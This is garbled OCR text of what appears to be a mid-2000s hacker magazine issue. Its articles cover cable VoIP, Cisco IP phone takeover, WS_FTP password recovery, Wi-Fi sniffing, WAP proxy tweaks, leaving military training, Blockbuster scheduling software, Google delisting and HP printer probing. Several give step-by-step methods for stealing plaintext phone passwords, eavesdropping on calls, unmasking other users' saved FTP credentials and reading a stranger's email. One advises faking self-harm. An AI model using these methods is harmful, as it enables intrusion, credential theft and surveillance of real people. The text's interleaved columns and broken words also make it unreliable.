name names, but Iwill drop a hint and let you know that they own AOL, CNN, and several other big names. The title of my j o b really means nothing. I just go t o customers' homes or businesses and set up wireless and wired networks. Interesti n g stuff but nothing too interesting. I this did for a month or so until I was given an opportunity t o switch over t o the Voice over I P (VoIP) department. Being an avid phone phreak I decided t o take this opportunity. After an intense traini n g session, Iwas left with a little more knowledge then Ihad before and a training manual. Since selling the manual on eBay seemed out o f decided the best place t o share the question, I my new information would be i n an article. The first misconception many people have with VoIP i s that your phone calls go over the I n ternet. While this is true with Vonage and other Internet phone companies, it is far from the truth with the phone system Iwork on. The VoIP system consists of the following: MTA: Media terminal adapter - cable modem. Coaxial Network: Coaxial cable is television cable, enough said. CMTS: Cable modem termination system, more on this later. MGC: Media Gateway Controller, see above notes. PSTN: Public switched telephone network, telco's existing network. The MTA works on the same basic principals as a standard DOCSIS (Data Over Cable Services I n terface Specification) cable modem. It even uses the same channelin the R spectrum. It can even F look the same as a standard cable modem except i n addition t o an RJ-45 jack and US6 port, it will also have an RJ-11 jack for a phone. This means i n almost a l l cases Internet and phone are run from the same device and the same coaxial cable. Both functions have their own MAC address and also their own I P address. Most cable modems have a buffer of 1500 bytes which will last about 10 seconds and will cause some noticeable delays on streaming video or music as packets are loss. Since delays for voice are unacceptable, the phone part of the modem only has a buffer of 160 bytes or about 20 milliseconds. This means t h a t if a packet is lost for voice, there i s no chance of it being resent. As mentioned earlier data and voice

share the same channels for upstream and downstream. To cut down on lost voice packets, they are given priority over data packets. This could cause some performance drops while surfing but they are hardly noticeable. The RJ-11 jack on the MTA acts the same as a jack t h a t i s hooked up t o C telco wiring, meaning it supplies -48 volts D for on-hook and 90 volts AC for ringing and a l l t h a t good stuff. It also supports d u a l tone multi frequency (DTMF). The MTA also has t h e j o b o f changing the analog voice signal i n t o digital packets. Once the MTA has transferred t h e packets, it sends them through t h e coaxial cable i n your neighborhood t o t h e CMTS. The CMTS i s also the same as w i t h a standard cable modem. It is located at a cable company office and terminates the packets f r o m t h e coaxial cable t o either fiber optics or Ethernet. For Internet, it routes t h e packets from t h e i r office t o t h e Internet. I n the case of phone, it keeps the packets on a managed network controlled by t h e cable company and used for VoIP only. Packets are routed t o different parts of t h e network dependi n g on who is calling whom. Eventually they are dropped o f f a t the MGC. Once the packets arrive a t t h e MGC they are further analyzed t o decide where they are going one last time. The job of the MGC i s t o send and receive packets t o and from t h e PSTN. So basically a l l the cable company has t o do i s get the packets from your house t o their office and then drop them o f f at the telco and l e t them deal with it from there. This article i s a condensed version o f a 500 page manual but I have included t h e most import a n t parts. There are a few minor details Ihave l e f t out such as various servers t h a t do nothing more than make sure your phone i s on the hook or o f f the hook, let people know your number i s disconnected, etc. A good section o f t h e training manual also deals with how t o hook t h e MTA up t o the customer's exiting phone wiring so they can use a phone i n every room instead of just plugging a phone i n t o t h e MTA. That section i s not that interesting and most people with any phone experience professional o r n o t shouldn't have t o worry too hard about that. The main idea o f this article was t o outline h o w and why t h e system works. Keep i n mind t h a t once the packets leave the MTA they are standard I P data packets and can be sniffed like a n y other packet regardless o f medium (coax, Ethernet or fiber).


3 5 '

by Moby Disk This article pertains t o the Cisco 7940 and 7960 I P phones. For those new t o IP phones, they function like normal office phones on a PBX but they run over Ethernet. This makes them highly hackable. The Cisco phones have a monochrome pixel-addressable LCD display. They communicate via 10/100 Ethernet at f u l l or half duplex. The firmware i s updateable and Cisco provides firmware t o support several voice protocols. Power can be provided via AC or via unused wires on the Ethernet cable. The phones communicate with a call manager server that handles configuration, mailboxes, etc. The phones support a wide variety of protocols. This article will use the main configuration protocols including Dynamic Host Configuration Protocol (DHCP), Trivial File Transfer Protocol (TFTP), and Telnet. Other supported protocols used include DNS, SNTP, and ICMP. Real-Time Transport Protocol (RTP) i s used for audio (Cisco 3). Various protocols including SIP, MGCP, and SCCP are used for signaling other phones. H l l P is supported for downloading graphics t o display on the LCD.

I Looked into these phones first out of hacker
curiosity: This is a great example of digital convergence. Iwas amazed that these phones were actually computers and that I could communicate with them using my desktop PC. I also wanted t o know how secure they were. Could someone listen i n t o calls? Fake calls? Make the phones randomly yell insults at coworkers? Well, I was


surprised t o find that Cisco didn't even put one b i t of thought into security. It is trivial t o do a l l of these things and more. Let's see how. Required Tools All you need t o execute the basic hacks is access t o the network that the phones reside on. I f your computers are on the same switch as the phones, you can just use your desktop PC. Otherwise, obtain a hub. A plain Windows 2000 workstation includes the necessary Telnet and TFTP client. Some of the more advanced tricks require a TFTP server. I f you do not have physical access t o the phones themselves, you will need a sniffer t o determine the IP addresses and names of the phones. Security The Cisco phones Iused provide no security whatsoever. Every employee necessarily has physical network access. A wireless router would allow anyone t o remotely control your phones without physically being i n the office. I n this particular office, the phones were actually accessible from outside the office! Once I had the IP addresses, I was able t o telnet t o the phone on my desk from my home PC. Newer versions of the Cisco Call Manager software require digital signatures t o make it more difficult t o spoof firmware updates and also supports IPSEC. I f you do use an I P phone system, I strongly recommend using the latest software and enabling IPSEC. You should also configure the phones t o disable Telnet access. This can be subverted by spoofing the TFTP server and sendi n g fake configuration files, but that i s much more difficult. Hacking So what exactly can be done remotely with these phones? You can do anything available via the menus or buttons physically on the phone. Remotely change phone settings Change the ring tones (predefined tones or use your own) Modify the firmware Change the logo on the display Redirect the company directory or the voice mail Remotely control phones Initiate calls (with speakerphone)

h a k e the phone ring Adjust the volume Take phone on/off the hook Crash the phone Without IPSEC, you should be able t o eavesdrop on phone calk with a packet sniffer. I n theory, you could redirect phone calk or change voice mail settings, but these are truly malicious activities and I not research how t o do this. did These actions would require I P spoofing which i s beyond the scope of this article. HOW-TO Start with physical access t o the phones and assume each phone i s password protected. Get the I P address, host name, and TFTP server for each phone by pressing the configuration button (the one with the picture of the check box) and selecting Network Configuration. The host name w i l l be something like 000CAED39328. I f you do not have physical access t o the phone, then you w i l l need t o sniff for this information. The main configuration menu



r2-i,-,- s - ( 7 ~ : tt

. .





Next, use a TFTP client t o retrieve t h e files \ "RingList.datU, "SIPDefault.cnf', and "SIPxxxxxx ~ x x x x x x . c n f ' where t h e x's represent t h e host name of the phone. Replace SIP with SCCP or MGCP if your server uses one o f these protocols (Cisco 1). The configuration f i l e s are plain text files containing the server settings, phone numbers, telnet Level, and an unencrypted password. Settings are the default configuration file and may be overridden i n each phone's configuration file. This password also allows y o u t o change configuration settings via the phone's menus by selecting the "Unlock Configuration" option i n the configuration menu. You may also telnet t o the phone using the I P address and password. From here, you can execute many commands. A f u l l list of commands i s available a t (Cisco 2). The test key command i s t h e most fun. Pressi n g thevolume buttons causes t h e phone t o ring. You can change settings such as ringtones by simulating the navigation keys. I t i s possible t o pick up the speakerphone and dial, then connect t o the destination phone and i n s t r u c t it t o pick UP. Changing Ring Tones a n d O t h e r Settings You can select any of t h e standard ring tones using the phone or via telnet. Ringlist.dat contains the description and f i l e name for each ring tone. You can download the r i n g tone files via TFTP, but you cannot upload n e w ones t o the server. The ring tone files are 8 kHz 8-bit u-law audio files <=2 seconds long (Cisco 3).
Close the telnet session. Enter hacbng mode. Emt hacking mode.

est open est close

The network configuration screen showing t h e DHCP sewer. MAC address. and host name. Notice t h e "lockn icon i n next t o t h e title, indicating t h a t we cannot change t h e settings yet.

volup: Volume up headset: Headset spkr: Toggle speakerphone mute: Mute info: Info msgs: Messages sew: Services dir: Directories set: Settings navup: Navigate up navdn: Navigate down test string test onhook test offhook Stn'ng can be any number o f 0..9, #, and *. This allows you t o control t h e menus and t o dial Place the phone on or off hook, as though someone picked it up. Can be used t o answer calls. Improper use of this can cause the phone t o confuse on and off hook (picking up the receiver can become the on hook state, and vice-versa) Ask the phone what keys it supports. This is useful i f your phone has additional navigation "soft" keys.

test ? test help




1 7


/ Using the existing ring tones i s neat, but
making your own i s very cool. Since you cannot upload files t o the TFTP server, t o use your own ring tones you need t o set up your own TFTP server and direct the phone t o use it. I n the phone's configuration screen i s a setting "Alternate TFTP." Set this t o yes. Then change the "TFTP Server" setting t o contain the I P address of your server. Now you can serve up your own firmware, ring tones, and configuration files. Serving your own configuration file allows you t o change the URL for the logo on the display, the URL for the corporate directory, and the phone number for the voice mail. Logo files must be 8-bit BMP files even though the LCD is black-and-white (VOIP 4). It looks like the corporate directory browser works like a minimal text-only web browser. I n this particular office, the phones did not have working DHCP so the H l l P server for the logo had t o be a single-homed H l l P server t h a t was accessible by IP. Conclusions I P phones are gaining i n popularity since they are becoming versatile, powerful, and easy t o install. Pricewise, they are competing very effectively against existing PBX systems. Expect t o see rapid growth i n the future. However, expect t o see more stringent security i n place now that the

phones ship with IPSEC. For now, have fun by listening i n on meetings and making your coworkers' phones taunt them. References (1) Information on the bootup process and the files residing on the server: "Converting a Cisco 7940/7960 CallManager Phone t o a SIP Phone...", Cisco Systems 1992-2004; http://www ~.cisco.com/warp/public/788/voip/handset~to e-sip.html (2) Telnet commands, monitoring options, and troubleshooting tips: "Monitoring Cisco SIP I P Phones (Versions 6.x and 7.x)", Cisco Systems 1992-2004; http://www.cisco.com/en/US/prod


~tion~guide~chapter09186a00801d1988. html (3) Physical phone setup, ring tones: "Getting Started with Your Cisco SIP IP Phone (Version 1.0)", Cisco Systems 1992-2004; http://www. ~cisco.com/en/US/products/sw/voicesw/ps215 r6/products-administration-guide-chapter091 ~86a0080087511.html (4) Logos, messages, directories, ring tones, general information, and Links: "Configuring Cisco 79xx phones with Asterisk", Arte Marketing 2004; http://www.voip-info.org/wiki-Asterisk% ~20phone0/~20cisco0/02079xx

by H2007 This file i s intended t o show you how t o view a password saved i n WS-FTP.ini using WSFTP itself. Tools needed: WS-FTP - any version. Step 1) Copy the user's WS-FTP.ini file stored i n \..\..\WS-FTP\. Take a copy of the WS-FTP.ini file and place it i n your \wS-FTP\ directory. Step 2) Open the file i n any text editor of your choosing. Here is a short example of what you will see.
[ WS-FTP321 HOST=ftp.randomftpserv.cOm UID=h2007 DIR= "/pub/win32 " PASVMODE=l TIMEOFFSET=O PWD=V9D8F029E316E1B1C2B2D1B173817B8936B3 B6A39A6A6A277AESB TYPE=6010

The text i n brackets [WS_FTP32] is the profile name set by the user. Selecting that is how you will display the information i n WSFTP. HOST i s of course the host address. UID is the valid user (name we will be using. PWD i s the "encrypted"

password we are attempting t o view. Step 3) Sure, you can simply connect with the password i n i t s masked form like it currently is. However our agenda here is t o decrypt it so we can view the password itself. Why? To know a valid password that the user uses. I n the UID area, copy and remove the user ID (in this case "h2007") and replace that with "anonymous". So UID=h2007 should now read UID=anonymous. Step 4) The fourth and final step i s very simple. Execute WS-FTP95.exe, click Connect and select the appropriate profile name. Voila, you now have an unmasked valid password, user name, and host. I n this case our password is "2600rocks!" Many schools and businesses use this software. It is not hard t o find several valid user names and passwords just by gaining access t o a user's \WS-FTP\ directory. You can also google "intitle:index.of ws-ftp.iniW and you will find several results. Happy Hacking!

by RSG Packet sniffers are incredible learning tools. Like many people, I have a wireless Internet router installed i n my apartment. It creates a small, wireless Local Area Network (LAN) which provides connectivity for my three computers. The other day Iwas tooling around on my LAN, using my trusty packet sniffer t o learn more about how my router works and how the various computers interact on the network. All o f a sudden Inoticed a f i f t h I P address was sending and receiving data. Five? But Ionly own three comhad a wifi leech. puters and a router. Bingo, I Wifi leeches are fairly common these days. It's a very common practice t o jump on an open wifi node when you see one available. 2600 has even provided information on more than one occasion on how t o detect wireless nodes (for example, see the cover design for the Summer 2002 issue). I've always thought, perhaps somewhat naively, that open wireless was better then closed and thus had never blocked access t o my router using a password or MAC address filtering. But this time it was personal. Iwas curious. Who was this leech? First a disclaimer: I'm not a professional sysadmin, nor am Ia low-level protocol ninja. But I've managed t o teach myself a thing or two about how networks work. This article is meant t o be introductory. Comments and additions are encouraged. Ihad t o move quickly. I toggled back t o the terminal where my favorite packet sniffer, tcpdump, was running. Tcpdump is ubiquitous. If you run a *nix operating system you most likely already have it installed. (Windoze people can use a port called "WinDump.") Since I wanted t o ignore a l l traffic except for the data going to/from my leech, Irestarted tcpdump using the "host" argument and my leech's I P address:
/usr/sbin/tcpdump -SO -i en1 -Aa host W192.168.1.103

I Mac OSX, so the "-i e n l " flag means sniff run on my en1 internet adaptor, i.e., my airport card. The "-Aa" and "-so" flags are the juicy parts. They t e l l tcpdump t o suck down the f u l l packets i n human-readable ASCII text. Fun! Check the man ( pages; your mileage may vary. A nice alternate t o

tcpdurnp i s Ethereal. Mac people should also check out EtherPEG which reassembles JPEGs or GIFs i n real time as they flow by. had my leech trapped. But what could Okay, I ILearn? First, Inoticed a Media Access Control (MAC) address i n t h e tcpdump output. These are unique hardware addresses assigned t o network adaptors. With a MAC address y o u can look up the vendor of the machine. I plugged t h e MAC address into http://www.coffer.corn/mac~find and made a note o f my Leech's computer type. After sifting through a few more pages of tcpdump output, I learned the make a n d model of my leech's computer as well as t h e t y p e and version number of the operating system, plus t h e make and model o f my leech's printer. Hmmm, should I send over a print job? You'll get a l o t o f uninteresting garbage, but here are a few strings t h a t are helpful t o grep through the tcpdump output with: @, GET, OK, USER, <html>. You'll no doubt discover your own favorite strings t o grep on. After a day or two, Ihad discovered a whole l o t about my leech: his name, t h e names o f his two email providers, the names o f t h e email lists he was subscribed t o (google t h e "SurvivePX" email list for a giggle), t h e names and email addresses of his friends ....You g e t t h e picture. So here i s the dilemma: if someone i s stealing your bandwidth, i s it okay t o spy on them? I ' m afraid the ethical answer i s probably no. But still, if I could read his email, then h e could read mine was reminded (if he had half a brain). I n effect, I of the importance of security a n d privacy: use encryption, and if you keep your node open (as I opted t o do), be conscious o f how people are using your network at a l l times. My Leech prompted me t o learn a l o t about how data moves around a LAN a n d what sort o f hope this information is revealed about a user. I was useful t o you. For more information on net. work protocols Iwould recommend W Richard Stevens' book TCP/IP Illustrated, Volume 1 (Addison Wesley) and Eric Hall's Internet Core Protocols (O'Reilly); For t h e technical specs o f I P and TCP you should also be sure t o read RFC 791 and RFC 793. Happy leech hunting.

v bv

Josh D


Let me just say h g h t out that some of the ideas described i n this article may not be perfectly legal - this article is meant t o be educational and if you attempt t o execute any of the ideas presented here, I take absolutely no rewill sponsibility for extra cellular charges you may incur or for any trouble you may get into with your cellular provider. What i s WAP? WAP is an acronym that stands for Wireless Access Protocol, which i s (on a very basic level) the technology that a cellular phone uses t o connect t o the Internet. There are several WAP browsers and the one t h a t w i l l be described today is called Openwave, which comes preinstalled on a bunch of cell phones. I have personally seen Openwave i n use on LG and Kyocera phones, but I'm sure these aren't the only phone brands that use Openwave. Openwave is generally not that hard t o tweak. Once the browser is running on a cell phone, one just has t o press and hold down the zero button (or menu button depending on the phone manufacturer) on their phone until they are greeted with a menu full of everyday browser features, such as "Reload" and "Bookmarks." The last item on the menu is "Advanced", which i s where the configuration of your WAP setup w i l l eventually end. I f you're following along on your own cell phone and you're seeing what I'm describing, you most likely have a cell phone manufactured by L G or Kyocera and your cell phone company (if you live i n the US) is probably Verizon. You'll notice that i n the "Advanced" menu, there is an option called "Set WAP Proxy". Keep this function i n mind. A WAP Proxy i s just an I P and a port that point t o what's called a WAP gateway, a program running on a computer that acts as a gateway (hence the name) allowing a cell phone t o connect t o the wireless Internet. It's fairly easy t o set up your own gateway, using your own computer's Internet connection. I use a gateway called WAP3GX, available at http://www r.wap3gx.com. A detailed explanation of configuration of a WAP gateway is beyond the scope of this article, but just know that the gateway (at least this i s true for WAP3GX) listens on UDP ports 9200 and 9201 and that you'll need t o configure your router and/or firewall accordingly t o forward these ports t o your computer. I f you're too lazy or

don't want t o attemDt t o set uo vour own WAP gateway, you can jukt use the brier public WAP gateway provided by http://www.waptunnel.com at or The only reason I recommend setting up your own WAP gateway i s because Waptunnel's tends t o not work very well most of the time (although you can find other public gateways if you Look around on Google). For now, let's just assume you have acquired an I P and a port of an active WAP gateway. The next problem is just getting a l l of this information into your cell phone. My main areas of expertise include cell phones made by L and Kyocera, so I ' l l briefly deG scribe how t o get into the service menu of cell phones made by those respective companies. On the newer LG phones with color screens, when you h i t the menu button from the home screen you'll notice there are nine menu choices from 19. Ever wondered why they didn't start at zero? Try hitting the zero button. You'll be asked t o enter i n a six-digit service code, which is usually a l l zeros. Now you're i n the service menu of the phone, and I wouldn't touch anything you don't feel confident i n messing around with, because it's pretty easy t o render a phone unusable by entering i n incorrect settings. You'll want t o select "WAP Setting" from the service menu and then "IP Sem'ng". Select "Link3-IP1". Write down what you see on a piece of paper i n case something goes wrong (so that you can "reset" the phone t o its default settings if you need to) and then replace the listed IP with the I P of your WAP gateway (don't enter the port). Hit OK and then h i t CLR. Select "Port Setting" from the menu, then select Link3-Portl, then again write down what you see, then enter i n the port of your WAP gateway. Hit OK and then END. Ihave tested this method with LG VX4400 and VX6000 cellphones but it will work for other L phones, although accessing the serG vice menu might be a little different - you might have t o press menu and zero at the same time, or press and hold menu and then press zero, or vice versa. On the other hand, if you have a Kyocera phone go t o the home screen and enter i n the number 1 11 1like you were going t o call that 1-1 number. You'll see a menu option pop up on the bottom of the phone. Scroll until you see a menu item called "Options", select it, and find another menu item called "Browser Setup". This is basically the same as the L setup from here, except G


G s t e a d of "Links", there are "Uplinks", and there are only two of them. Change the information i n Uplink B t o that of your WAP gateway. The service menu i s the trickiest part of this operation, and if you're having trouble entering seth'ngs or if you find my instructions inadequate or have a phone manufactured by a company other than L or Kyocera, there i s plenty of inforG mation about a l l this on the Internet (http://www.howardforums.com i s a good place t o start.) - j u s t search for "WAP". The hardest part i s now out o f the way. Try reopening your WAP web browser and change the active WAP Proxy (as described i n the beginning of this article) t o Proxy 3 if you have an LG Phone or Proxy B if you have a Kyocera phone. I f you see a page asking you t o enable security features, it means t h a t you haven't properly configured the browser t o conned t o your WAP gateway - you're still connecting t o your cellular provider's gateway. I f everything went according t o plan, the phone should connect t o your gateway and prompt for a default home page t o display. Note that most o f the WAP-enabled phones only can browse through and display WML (Wireless Markup Language) pages as opposed t o HTML pages, so you'll need t o go hunting for WML pages. Google's wireless WML page is located at http://wap.google.com, which is nifty for finding other WML sites. Wireless Mapquest i s located at http://wireless.mapquest.com/aolmq_wml, and wireless Superpages i s located a t http://wap ~.superpages.com/cgi/cj_client.cgi, t o name a few sites. All of these Links would be entered into your cell phone a t the prompt. Browsing isn't the only thing you can do with

WAP, however. I f you use Cerulean Studio's mulbnetwork chat program, Trillian Pro (available at http://www.trillian.cc/), you can download a plug-in for Trillian called I.M. Everywhere, which i s available a t http://www.iknow.ca/imeverywhere/. This program i s a miniature HTTP server (not a WAP gateway) t h a t w i l l l e t you I M anyone that i s on your Trillian buddy list from your phone. Trillian supports ICQ, AIM, MSN Messenger, and Yahoo Messenger, which means t h a t you will be able t o I M a l l of your buddies on your phone without paying for text messages. I.M. Everywhere broadcasts i n both WML and HTML so you would enter your own I P i n t o t h e default home page prompt on your phone t o get this working, or you could enter your I P i n t o any I n ternet browser on a computer a n d use I.M. Everywhere t o controlTrillian remotely. One very important thing t o n o t e i s t h a t WAP requires cellular airtime. You w i l l be charged, i n minutes of time spent on the wireless web, for data transfer on your phone bill. There i s no extra charge for wireless Internet (like there normally would be), only regular airtime "talking" minutes (at least with Verizon), which means t h a t you w i l l most likely have free WAP nights and weekends instead of seeing a dialed number on your phone bill, you would just see "DATA TRANSFER". Your cellular provider will almost definitely not support doing what is outlined here - so i f you're goi n g t o t r y any of this on your own, t r y it with caution. Again, I take absolutely no responsibili t y for extra cellular charges you may incur or for any trouble you may get i n t o w i t h your cellular provider if and when you t r y a l l o f this. That said, hope you learned something! have fun and I


by Bac This article i n no way supports using these methods and is only written for informative purposes. I f you sign up, you should stick it out like a good sedceperson. These observations were done when I was exiting the USAF during my Basic Military Training segment. From what I t e l l the system is set up can t o bounce back people who are questionable once they enter into the service. So you are going into the military. Be sure t o have long talks with your recruiter, ask lots of questions, and make sure you can quote questionable remarks or what may be blatant Lies verbatim. That is the first thing you can do t o protect

yourself from what could possibly happen. I n fact, everyone who leaves within the first 180 days of service is granted an "entry level separation," be it for good reason, b a d reason, or ugly reason. So the scare tactics they use t o keep you i n Line are i n fact not quite as valid as stated. (You know the good ole UCMJ.) That does not fully apply until after your first 180 days o f training. Most of the way the exit process works is very compartmentalized. Each person a t a desk knows little t o nothing about the other links - from the people i n your, own wing, t o the BAS, t o the processing folk, t o the docs and other assorted people. Some are enlisted, some are civilians, and some are officers. Not one person has all the

I mhkbuster's Compass by Aristotle As of March lst, 2005, every Blockbuster employee will have spent hours reviewing the new software corporate uses for payroll management: Compass. Created by Bluecube, the expansive software package also includes training modules t o help "streamline" future employee promotions. At its core, the Compass training system i s a series o f web-based PDF files and interactive Flash media. Employees click through the selected tasks or read the required documents, and take a brief quiz when they have completed a module. Tasks include learning how t o entering your payroll corporate ID and password t o clock i n and out, making schedule requests, and viewing their assigned work week. Sadly, there i s no way t o skip ahead, so anyone who has used any menu-driven software before is required t o move

G w e r s . All of this Ihad t o learn from experience with all the various people involved i n this process. The intent of all the processes is t o deter people from leaving. The military is having major issues with retention so every effort is made t o return recruits t o training. Also, some of the information that I received is rumor. Here is my attempt t o separate fact from fiction on the subject of exiting. 1 Your recruiter cannot lie t o a superior i n re. gards t o direct questioning about a statement. 2. The service will do whatever it can t o stick you with the bill and not pay you, such as if you come clean about a medical history issue, even if your recruiter told you t o lie (this is where being able t o quote questionable remarks verbatim is important). They will most likely stick you with the bill and send you home with some of your gear, and may i n fact charge you. 3. They will send you back t o your point of entry or your home of record. 4. They will spend about two weeks processing your file i n regards t o exit. Once you try t o Leave it's not all easy. It is still military protocol and even if you have a complete breakdown, it's no walk i n the park. They may lock you up i n the ment a l ward at the hospital. 5. I f you try and get hurt or don't drink enough water (heatstroke), they will just send you t o get patched up and returned t o training. 6. The easiest way t o get isolated from your

group of recruits and speed up the exit process is t o claim self harm or a desire t o harm others, Homosexuality has t o be attempted i n practice, not statement, i n order t o get removed from basic. Also, i f you harm others I know nothing of the process that they would use t o isolate you, but I presume they would keep you heavily medicated. 7. Your medical history that you suppressed at MEPS (Military Entry Processing Station) will probably come back t o haunt you i f you t r y t o use that t o Leave. Simply put, the blame will be placed upon you and your pay will be revoked, or they will say you are claiming false diseases and return you t o training. 8. This one is quite surprising. Going AWOL (absent without leave) from BMT may only get you an orange vest if you return willingly, along with a required service of 40 days with the rest of the rejects, and forfeiture of pay. But you still get an "Entry Level Separation." 9. I f you use illegal drugs, even i f you pass the test at MEPS, they will test you for traces and kick you out when they have the results back, even i f you are a week from graduation from basic. 10. You can exit cleanly if you keep your ears open and realize that the system is not as stacked against you as you might think, and that the exit routine is easy t o access. This is entirely for informative purposes only. It's intended for use i n case the draft is reinstated, or if you really make a major mistake by joining.







at the same pace as someone who has never seen a keyboard. While this does ensure that every employee has been presented with a l l the relevant information, mind-numbing i n i t s redundancy, it also ensures a l l but the most simple of employees will ignore what they are supposed t o read, feeling their very I Q being drained by the system's tediousness. Once the system goes live, it will schedule employees according t o need, as judged by Compass. I n the test run this week, many "full-time" employees found they, had fewer than fifteen scheduled hours i n the coming work week, while lower-paid part-time employees were given an excess. Unqualified personnel were scheduled t o run store-wide inventories, and almost every individual I've spoken t o found they had been scheduled during times at which they were un-

Gailable. These problems may be resolved by launch, but it i s uncertain. Another aspect of the Compass system is i t s ability t o be remotely monitored. Four times a shift the Manager-on-Duty (MOD) i s required t o update the daily task list with what employees had accomplished what, and at what time. At any point i n the day, the district and regional directorate, and likely others higher On the chain, can see any store's updated task list. The threat of constant surveillancebe is intended t o a Upowerful motivator," claimed one store manager during a meeting. addition to disallowing employees from clocking out from their shifts at any time, a violation of many states' labor laws, the numerous checks and balances put i n t o place requiring a manager override (with a handy alert sent t o cor-

porate each time) t o accomplish many mundane tasks has already decreased productivity, two weeks prior t o the software's f u l l implementation. 1 , t h e big blue, ever strivingto make the workplace more inhospitable and unbearable for employees, have continued t o astound and confuse their workers with each additional bureaucratic layerplace n they behee customers. The meager US a" Our paychecks they dangle before us d o little t o assuage the knowledge t h a t we a r e i n fact part of this machine. Iknow Ihave made my decision, and I'd Like t o thank Bluecube Software for assuri n g me it was the right one. Related Links: www.blockbuster.com, www.bluecube.com




, I


. ' L






by Chess ' < E T A N&%RBOT~" CONTENT=,~NOINDEX, "Just when I thought that I was out they pull , b ~ o ~ ~ ~ ~ ~ " > AlternaYively, you can allow every search enme back in!" Learn t o stay out of Google. Most people are dying t o get their sites listed gine except for Google t o index Your Page. Just i n Google. But what if you want your site out of add this tag: Google's listings? Maybe you want t o keep your <META NAME= "GOOGLEBOT" C O N T E N T = " N O I N D E X , site private, or you don't want a bunch of creeps b N O F O L L O W r ' > This next tag will remove t h e "snippets" from surfing t o your page trying t o find animal porn. Maybe you just hate Google, are paranoid, or the Google results it returns. Snippets are the dehave some copyrighted material on your page scriptive text underneath t h e URL when you p u l l up a list of Google results. It has your search that you need out o f Google's cache today. Whatever the case, it's actually pretty easy t o get out terms bolded within the snippet t o show you of Google and start t o bask i n relative anonymity. what context your terms are being used in. <META NAME= "GOOGLEBOT" C O N T E N T = " N O S N I P Because once you're out, then your page is off the Internet for a l l intents and purposes. Having b P E T " > If you want your page t o b e listed i n Google your page delisted i n Google is almost Like having your page password protected where the pass- but don't want them t o store a n archive of your page, then add only this next t a g t o your header: word i s your URL! (In this article, I alternate between keeping Google's bots out of your page and CMETA NAME="ROBOTS" CONTENT="NOARCHIVE"~ This i s handy if you have a page t h a t changes keeping a l l search engine bots (there are other you don't want search engines now?) out. I'm assuming that if frequently, i s time critical, or if searchers t o be able t o see y o u r old pages. For you want out of Google you want out o f them all. I f you really only want out of Google then use example, if you're a professor posting test solu"Googlebot" instead o f "Robots" i n the following tions or something similar you'd definitely want t o remove Google's cache if y o u plan on reusing examples.) The first thing you want t o do is add some the test. After you add a l l the meta t a g s you want, you meta tags t o your index.html. I f you want Google and every other engine - t o ignore your entire may be finished. But if you're t r y i n g t o keep bots site during i t s spidering of the web, add this out of your entire site permanently, the next meta tag t o your header: thing t o do is create a robots.txt f i l e i n your


S p r i n g



2 3 '

/I;ebsite1s root directory. Pull up Notepad and type i n the following two lines:

Special thanks t o Google's Listing ~ e m o v a i Resource which i s at: http://www.google.com.gr/ &remove. html User-agent: * The above page can also help you if you want Disallow: / Save this file as robots.txt and f t p it t o your t o remove images from Google's image search ensite's root directory. This will t e l l the Googlebot gine. Especially handy if you don't want people t o be able t o link your name t o your face or find and actually a l l other search engines not t o your wedding photos. You can learn more about bother looking at your page and t o spider somerobots.txt files and what they can do here: where else. Obviously, if you create this file then http://www.robotstxt.org/wc/norobots.html you don't need the meta tags but if you're extra Of course, it may simply be easier t o password paranoid then you should use both methods Like I protect your page if you don't want people seeing did. what's inside. But sometimes that's not feasible After you've done a l l that, go and sign up for because of the inconvenience it may pose t o your a Google account a t http://services.google audience. Besides, Google can index passwordprotected pages according t o Google's corporate ~.com/urlconsole/controller This page is for people who urgently want information page. Not only that, but anything their URLs removed from the index. Even then it that is simply sharing space on your server is fair will take up t o 24 hours. But if you'd rather wait game t o the Googlebot like Excel or Word files. six t o eight weeks, be my guest. After you create Even SSL pages can be indexed. The above methan account, Google w i l l email you a link where ods willserve t o hide your page by practically disconnecting it from the web. Once I out I was tried you enter the URL of your robots.txt file you just t o Google for my name and page and sure enough uploaded and then Google sends their bot over t o it was gone. It was like the page didn't exist and your site right away t o read it. With any luck, it gave me such a nice warm fuzzy feeling inside. you're out of the index i n a day or two. I out was One disclaimer though: if you were using i n less than 12 hours. I f you want t o get back in, Google as your in-house search engine solution just remove a l l the meta tags and the robots.txt t o help your users find information on your page file. As Long as someone is linking t o you some- it will no longer work once you've been delisted. where you'll be listed again after Google's next Have fun! Shoutouts to the Boneware Crew. web crawl.

H P Printers:
HP did build i n password protection, but it is disabled by default and i n fact, i n a l l my exploring I I recently reading a book of fictitious sce- didn't find a single printer that had a password was narios i n which a hacker gains access t o a net- set. Many of these printers also have an f t p work through a printer. The book cited a t o o l server enabled by default, and again the passcalled Hijetter available a t phenoelit.de. Hijetter words are a joke. Different models have different i s a t o o l for windows which uses HP's PJL protocol default passwords and t o list them here would be pointless (use google). I n case the implications t o connect t o and perform simple tasks on certain printers. Curiosity got the best of me so I aren't obvious t o everyone yet let's review. These started doing a little research into what exactly printers have web and f t p servers running out of these printers are capable of. First let's look at the box. With a beefy 8mb of flash memory storsome of the features built into these printers; age a printer suddenly becomes an attractive many ship with built-in web servers which allow place t o anonymously store a l l sorts of fun for remote administration. These servers allow a things. But this i s only the tip of the iceberg. First let's look at how t o find printers. As an remote administrator t o see the status of the administrator is setting up a network he is worprinter, view recent print jobs, and change environment variables. It i s worth mentioning that ried about a l o t of things. Keeping the bad guys

by DarKry darkry@gmail.com

'out i s top priority. After configuring a firewall t o only allow the right people access t o the right ports the rules can start t o look like a giant game of Blinko. It i s understandable that blocking the printer spooling port from outside access may not have crossed the admin's mind. I n f a d there are valid reasons t o allow this, for instance, t o allow employees t o print from home. All ports aside, a printer definitely doesn't appear t o be a threat. After all, what damage can a printer do? Fire up nmap and run a scan on your corporate network for machines with port 9100 open. Once you have a list, t r y surfing t o each address. Chances are most of them will have a web server. Those who are interested i n getting their hands dirty can get a library for PJL communication, also from the folks at Phenoelit. Now so far this has been a relatively benign hack. We have accessed a printer and the most damage we can do i s lock it with an error or print was "Insert Coin" on the LCD display. I starting t o get bored with a l l this and about t o move on t o bigger and better things when Inoticed something strange about some of the newer printers

